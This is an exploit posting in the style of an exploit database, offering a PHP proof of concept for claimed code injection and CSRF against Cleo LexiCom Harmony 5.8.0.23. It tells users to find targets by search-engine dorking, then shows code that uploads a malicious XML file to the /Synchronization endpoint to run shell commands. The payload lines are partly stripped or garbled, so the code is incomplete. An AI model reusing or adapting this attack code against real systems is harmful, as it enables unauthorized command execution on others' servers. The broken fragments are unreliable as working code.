============================================================================================================================================= | # Title : Cleo LexiCom Harmony 5.8.0.23 PHP Code Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://cleo.com | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Uploads a malicious XML file that can execute shell commands on the target. Exploits CSRF to execute unauthorized commands via the application. [+] save code as poc.php . [+] USage : cmd => c:\www\test\php poc.php [+] SeT target = Line : 34 + 39 + 68 [+] PayLoad : \n"; $payload .= "\n"; $payload .= " \n"; $payload .= ""; $postData = "--$boundary\r\n"; $postData .= "Content-Disposition: form-data; name=\"file\"; filename=\"exploit.xml\"\r\n"; $postData .= "Content-Type: application/xml\r\n\r\n"; $postData .= $payload . "\r\n"; $postData .= "--$boundary--\r\n"; $headers = [ "Content-Type: multipart/form-data; boundary=$boundary", "VLSync: Multipart;l=0,Acknowledge" ]; $url = "$target/Synchronization"; $response = sendRequest($url, $postData, $headers, 'POST'); if (strpos($response, "Success") !== false) { echo "[+] Exploit sent successfully!\n"; } else { echo "[-] Exploit failed!\n"; } } // 📌 تحديد الهدف $target = "http://127.0.0.1"; exploitCSRF($target); ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================